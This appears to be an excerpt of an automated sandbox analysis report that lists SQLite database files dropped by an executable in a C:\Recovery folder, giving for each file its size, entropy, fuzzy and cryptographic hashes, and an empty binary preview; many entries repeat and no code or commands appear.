                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):98304
                                                    Entropy (8bit):0.08235737944063153
                                                    Encrypted:false
                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
